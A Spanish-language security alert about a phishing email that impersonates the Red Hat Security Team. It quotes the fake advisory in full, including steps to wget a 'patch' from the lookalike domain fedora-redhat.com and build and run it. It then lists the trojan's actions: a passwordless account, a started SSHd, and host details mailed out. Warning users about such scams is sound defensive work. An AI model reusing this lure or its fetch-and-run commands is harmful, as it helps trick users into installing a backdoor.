Falso mensaje de alerta a usuarios de Red Hat Fedora

El mensaje contiene el siguiente texto:

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to  execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT ed. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Again, please apply this patch as soon as possible or you risk your system and others to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Cuando el usuario descarga y ejecuta este parche, el troyano puede realizar las siguientes acciones:

1. Crear un usuario "bash" sin contraseña

2. Capturar la dirección IP y la hora de ejecución

3. Ejecutar SSHd

4. Enviar esta información a la dirección "root@addlebrain .com"


Más información:

Fedora-Redhat Fake Security Alert / Trojan Source Code & Analysis
http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt